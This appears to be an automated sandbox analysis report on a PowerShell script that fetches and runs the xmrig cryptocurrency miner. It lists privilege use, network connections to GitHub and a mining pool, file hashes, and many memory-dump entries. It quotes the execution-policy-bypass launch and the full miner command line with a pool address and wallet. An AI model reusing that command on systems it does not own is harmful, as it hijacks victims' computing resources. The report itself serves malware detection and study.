Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 tcp

Files

memory/948-0-0x00007FFDEFC33000-0x00007FFDEFC35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5w2ie4kh.oay.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/948-9-0x0000023D54390000-0x0000023D543B2000-memory.dmp

memory/948-10-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/948-11-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/948-12-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/948-14-0x0000023D548A0000-0x0000023D548B2000-memory.dmp

memory/948-15-0x0000023D543D0000-0x0000023D543DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2460-46-0x0000018CB8D20000-0x0000018CB8D40000-memory.dmp

memory/2460-47-0x0000018CB8D70000-0x0000018CB8D90000-memory.dmp

memory/2460-48-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-52-0x0000018CB8DB0000-0x0000018CB8DD0000-memory.dmp

memory/2460-49-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-51-0x0000018CB8D90000-0x0000018CB8DB0000-memory.dmp

memory/948-50-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/948-53-0x00007FFDEFC33000-0x00007FFDEFC35000-memory.dmp

memory/948-54-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/2460-55-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-56-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-57-0x0000018CB8D90000-0x0000018CB8DB0000-memory.dmp

memory/2460-58-0x0000018CB8DB0000-0x0000018CB8DD0000-memory.dmp

memory/2460-59-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-60-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-61-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-62-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-63-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-64-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-65-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-66-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-67-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-68-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-69-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-70-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-71-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-72-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-73-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-74-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-75-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-76-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-77-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-78-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-79-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-80-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-81-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-82-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-83-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-84-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-85-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-86-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-87-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-88-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-89-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-90-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-91-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-92-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-93-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-94-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-95-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-96-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-97-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-98-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-99-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-100-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-101-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-102-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-103-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-104-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-105-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-106-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-107-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-108-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-109-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-110-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-111-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-112-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-113-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-114-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-115-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-116-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-117-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp